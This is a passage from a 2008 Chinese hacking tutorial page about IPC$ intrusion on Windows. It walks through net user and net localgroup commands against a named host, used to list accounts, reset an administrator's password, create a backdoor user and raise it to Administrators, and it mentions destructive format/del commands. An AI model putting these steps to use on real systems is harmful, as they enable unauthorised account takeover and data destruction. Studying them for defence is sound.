用户登录  |  傲看软件园 用户注册
文章中心广告代码ASP源码PHP源码JSP源码.NET源码源码相关傲看留言板繁體中文
当前位置:傲看软件园文章中心电脑安全安防技术

黑客攻防技术内幕-防止入侵的方法(3)

减小字体 增大字体 作者:风未起时  来源:中国站长学院  发布时间:2008-10-20 19:37:59
6.1 IPC$漏洞入侵(3)

    

6.1.3  基于IPC$高级入侵

6.1.2小节讲述了通过NCX99建立远程登录,接下来将看看入侵者利用远程登录能做些什么?

注意:

本节前提是已远程登录到服务器。

入侵测试:

测试主机:61.150.115.9

(1) 查看目标机所有用户列表,在远程的命令提示符下运行如下命令格式:

net user

输入完毕后按Enter键,系统便会列出用户列表,如图6-22所示。

6-22  列出目标机的用户列表

(2) 查看某个用户信息,在远程的命令提示符下运行如下命令格式:

net user system32

命令解释:

查看用户名为system32的用户属性。

输入完毕后按Enter键,接着系统会列出该用户的一些信息,如图6-23所示。

6-23  列出用户system32的信息

从本地组会员中可以看出该用户隶属于Administrators组,也就是超级用户,对计算机有完全操作的权力。

(3) 入侵者还可以更改用户密码,在命令提示符下输入如下格式:

net user system32 hacker1219

命令解释:

将用户名system32的密码更改为:hacker1219

输入完毕后按Enter键,接着会显示命令成功完成,如图6-24所示。

6-24  更改用户密码

(4) 在目标机上添加用户可以在命令提示符下输入如下格式:

net user admin system /add

命令解释:

添加一个用户名为system的用户,并设密码为system

输入完毕后按Enter键,接着会显示命令成功完成,如图6-25所示。

6-25  向目标服务器添加用户

刚添加的用户Admin隶属于Users组,使用如下命令查看:

net user admin

输入完毕后按Enter键,如图6-26所示。

6-26  查看用户Admin的属性

(5) 在远程登录目标机后提升用户权限时可在命令提示符下输入如下格式:

net localgroup administrators admin /add

命令解释:

将用户Admin添加到Administrators组里。

输入完毕后按Enter键,接着会显示命令成功完成,如图6-27所示。

6-27  提升用户权限

(6) 如果需要在远程登录目标机后删除用户可在命令提示符下输入如下格式命令:

net user admin /delete

命令解释:

删除用户Admin

输入完毕后按Enter键,接着会显示命令成功完成,如图6-28所示。

6-28  删除用户

入侵者甚至可以使用FormatDel等命令,对目标服务器进行破坏,也会启动和停止服务器的某些服务,从而使系统面临着巨大的危险。


Tags:

作者:风未起时

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论

精品栏目导航

关于本站 | 网站帮助 | 广告合作 | 下载声明 | 友情连接 | 网站地图
冀ICP备08004437号 | 客服Q:354766721 | 交流群83228313
傲看软件园 - 绿色软件,破解软件下载站! 源码网 源码之家 绿软之家
Copyright © 2003-2010 OkHan.Net. All Rights Reserved .
页面执行时间:22,125.00000 毫秒
Powered by:OkHan CMS Version 4.0.0 SP2